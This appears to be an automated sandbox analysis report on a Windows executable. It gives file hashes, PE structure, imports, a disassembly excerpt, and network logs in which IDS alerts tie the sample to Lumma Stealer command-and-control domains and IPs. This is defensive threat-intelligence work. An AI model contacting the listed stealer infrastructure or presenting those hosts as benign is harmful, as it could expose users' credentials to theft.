                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.4.0.<./.P.i.

                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B37.tmp.xml

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4579
                                                                                                                                                                                                                                                                      Entropy (8bit):4.471324769940205
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsnMJg77aI9bQWpW8VYoYm8M4JRK6cFRu+m+q8IJpXSQxBJz14JUd:uIjfnKI7Vp7VAJsmZS0JzmJUd
                                                                                                                                                                                                                                                                      MD5:7A6AF7FFEC3ACAF3308A6A4FE6EA0DAA
                                                                                                                                                                                                                                                                      SHA1:60FF5A5EECE3DB8EF168CECDAD1CDF5197698789
                                                                                                                                                                                                                                                                      SHA-256:5ED684C88D38102494321960D5D92556658A19650046BB7C61355A06C8513E9F
                                                                                                                                                                                                                                                                      SHA-512:78A4095851F1FDA661386B684DC22DC8D2A631EE9C09CDF91E1524A53C996573125883803C44CC2490529C6B623DF3F97907D57E16DB47EC8064E86C93684E03
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643504" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                                      Entropy (8bit):4.393782715220416
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:Jl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAWOBSqa:f4vF0MYQUMM6VFYSWU
                                                                                                                                                                                                                                                                      MD5:85829358ABC77746004C754338356665
                                                                                                                                                                                                                                                                      SHA1:454893B1039E42C66D076E9192ED8F5B9590AFBB
                                                                                                                                                                                                                                                                      SHA-256:2291826D0A36E4961F5E8B6C21233B9BADA14A875A340533FDA030DC99F70DFF
                                                                                                                                                                                                                                                                      SHA-512:7B265329D614BDF6531E08CD5696F657CB642F98A6E605E5472978AF55BB60D9A53E72E3DBC010ED4FA4501F8C234039D708FAED57CF1A4868C0BF2D6F501D32
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Y...U..............................................................................................................................................................................................................................................................................................................................................D..-........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                      Entropy (8bit):7.380744581823742
                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                      File name:NQbg5Ht2hW.exe
                                                                                                                                                                                                                                                                      File size:296'448 bytes
                                                                                                                                                                                                                                                                      MD5:d1137063cca03f3d3079c8c4db839b95
                                                                                                                                                                                                                                                                      SHA1:2a919e2a2cd02b7b433432602f5d74034fbaffc4
                                                                                                                                                                                                                                                                      SHA256:f91431bb0d797065ad6803c552059cad9b7d3b9bc695e29b1e666850376945ca
                                                                                                                                                                                                                                                                      SHA512:7b9bb0ffbb645fbc4103866ac2e6b6f99c24f8e9172a22ff357a5348915955d264b21696d6e510dbc57aef224111b4701b15f4648af6f2cd1db6584d33eceafc
                                                                                                                                                                                                                                                                      SSDEEP:3072:hBcrUsnHvSGL0cSky2MZmDNpPbSrY4mtjgGrcQTbQNWvuIh+89FfS8JVYb553f3W:45HvSGLfzQmDXF4mumQ2r1JVyv
                                                                                                                                                                                                                                                                      TLSH:A054F11179A3C872C48BD5309560C7B1AF6B783267B5998B73981B7E5F302C3A73A709
                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-,..-,..-,...,..-,...,..-,...,S.-,.)V,..-,..,,..-,...,..-,...,..-,...,..-,Rich..-,........................PE..L...`..d...

                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                      Icon Hash:63396de961437e0f

                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Entrypoint:0x404876
                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                      Time Stamp:0x64C6BB60 [Sun Jul 30 19:34:56 2023 UTC]
                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                      Import Hash:aa45dd407879e6b8355707382a3243fe

                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                      call 00007FD2295207FEh
                                                                                                                                                                                                                                                                      jmp 00007FD22951BDEDh
                                                                                                                                                                                                                                                                      call 00007FD22951BFACh
                                                                                                                                                                                                                                                                      xchg cl, ch
                                                                                                                                                                                                                                                                      jmp 00007FD22951BF94h
                                                                                                                                                                                                                                                                      call 00007FD22951BFA3h
                                                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                                                      jmp 00007FD22951BF8Bh
                                                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                                                      mov ch, cl
                                                                                                                                                                                                                                                                      xor cl, cl
                                                                                                                                                                                                                                                                      jmp 00007FD22951BF81h
                                                                                                                                                                                                                                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                                                      fpatan
                                                                                                                                                                                                                                                                      or cl, cl
                                                                                                                                                                                                                                                                      je 00007FD22951BF76h
                                                                                                                                                                                                                                                                      fldpi
                                                                                                                                                                                                                                                                      fsubrp st(1), st(0)
                                                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                                                      je 00007FD22951BF74h
                                                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                                                      fld st(0), st(0)
                                                                                                                                                                                                                                                                      fld st(0), st(0)
                                                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                                                      fsubrp st(1), st(0)
                                                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                                                      faddp st(1), st(0)
                                                                                                                                                                                                                                                                      fmulp st(1), st(0)
                                                                                                                                                                                                                                                                      ftst
                                                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                                                      fstsw word ptr [ebp-000000A0h]
                                                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                                                                                                                                      jne 00007FD22951BF77h
                                                                                                                                                                                                                                                                      xor ch, ch
                                                                                                                                                                                                                                                                      fsqrt
                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                      pop eax
                                                                                                                                                                                                                                                                      jmp 00007FD2295209CFh
                                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                                      fld tbyte ptr [00440BDAh]
                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                                      or cl, cl
                                                                                                                                                                                                                                                                      je 00007FD22951BF7Dh
                                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                                      fldpi
                                                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                                                      je 00007FD22951BF74h
                                                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                                      fldz
                                                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                                                      je 00007FD22951BF69h
                                                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                                      jmp 00007FD2295209A5h
                                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                                      mov cl, ch
                                                                                                                                                                                                                                                                      jmp 00007FD22951BF72h
                                                                                                                                                                                                                                                                      call 00007FD22951BF3Eh
                                                                                                                                                                                                                                                                      jmp 00007FD2295209B0h
                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                                      add esp, FFFFFD30h
                                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                                                      fstcw word ptr [ebp+0000005Ch]

                                                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                                      • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                      • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                      • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3edd00x28.text
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x39d0.rsrc
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2e680x40.text
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x18c.text
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                      .text0x10000x3e6d80x3e80072dec12620101750e7cd5b6507da7d47False0.87237890625data7.796934543809841IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                      .data0x400000xabe80x6000de2ac8e19acb00a08914e765bf8af915False0.08186848958333333data0.9752363277723718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                      .rsrc0x4b0000xa9d00x3a00c14df5d1dfda44c27a433b64ee973162False0.44558189655172414data3.9505950594415182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                      RT_ICON0x4b1e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5368663594470046
                                                                                                                                                                                                                                                                      RT_ICON0x4b1e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5368663594470046
                                                                                                                                                                                                                                                                      RT_ICON0x4b8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.40943983402489625
                                                                                                                                                                                                                                                                      RT_ICON0x4b8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.40943983402489625
                                                                                                                                                                                                                                                                      RT_ICON0x4de500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.449468085106383
                                                                                                                                                                                                                                                                      RT_ICON0x4de500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.449468085106383
                                                                                                                                                                                                                                                                      RT_STRING0x4e5380x496dataTamilIndia0.444633730834753
                                                                                                                                                                                                                                                                      RT_STRING0x4e5380x496dataTamilSri Lanka0.444633730834753
                                                                                                                                                                                                                                                                      RT_ACCELERATOR0x4e2e80x50dataTamilIndia0.825
                                                                                                                                                                                                                                                                      RT_ACCELERATOR0x4e2e80x50dataTamilSri Lanka0.825
                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x4e2b80x30dataTamilIndia0.9375
                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x4e2b80x30dataTamilSri Lanka0.9375
                                                                                                                                                                                                                                                                      RT_VERSION0x4e3380x1fcdata0.5433070866141733

                                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                      KERNEL32.dllWriteConsoleInputW, SetComputerNameExA, GetConsoleAliasExesLengthA, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, GetComputerNameW, GetModuleHandleW, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, CopyFileW, VerifyVersionInfoA, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, GetCommMask, GlobalUnWire, FreeEnvironmentStringsW, EnumDateFormatsW, OpenEventW, SetCalendarInfoA, GetVersionExA, ReadConsoleInputW, TerminateJobObject, GetCurrentProcessId, FindNextVolumeA, SetFileAttributesW, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, CloseHandle, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapReAlloc, ReadFile, InitializeCriticalSectionAndSpinCount, RtlUnwind, RaiseException, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, CreateFileA

                                                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                      TamilIndia
                                                                                                                                                                                                                                                                      TamilSri Lanka

                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                      2024-12-23T07:01:17.451107+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.9572931.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:17.593871+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.9498071.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:17.733544+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.9625471.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:17.878639+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.9542751.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:18.312820+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.9571451.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:18.706968+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.9552191.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:18.854285+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.9639131.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:18.994329+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.9625351.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:19.136590+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.9636181.1.1.153UDP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:21.013322+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94972223.55.153.106443TCP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:22.036909+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.94972223.55.153.106443TCP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:23.588702+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949733172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:24.615424+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949733172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:24.615424+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949733172.67.157.254443TCP
                                                                                                                                                                                                                                                                      2024-12-23T07:01:25.426775+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949739172.67.157.254443TCP

                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.508224964 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.508277893 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.508377075 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.526546955 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.526593924 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:21.013226032 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:21.013322115 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:21.036602974 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:21.036622047 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:21.037020922 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:21.082609892 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:21.344407082 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:21.387335062 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.036948919 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.036982059 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.037015915 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.037031889 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.037054062 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.037158012 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.037158012 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.037189007 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.037342072 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.185102940 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.185169935 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.185247898 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.185261965 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.185405970 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.221376896 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.221431017 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.221484900 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.221494913 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.221549034 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.221606016 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.221678019 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.224447966 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.224462032 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.367716074 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.367758989 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.367875099 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.368336916 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.368359089 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.588576078 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.588701963 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.593841076 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.593856096 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.594280958 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.634833097 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.659159899 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.659183979 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:23.659323931 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615436077 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615540981 CET44349733172.67.157.254192.168.2.9
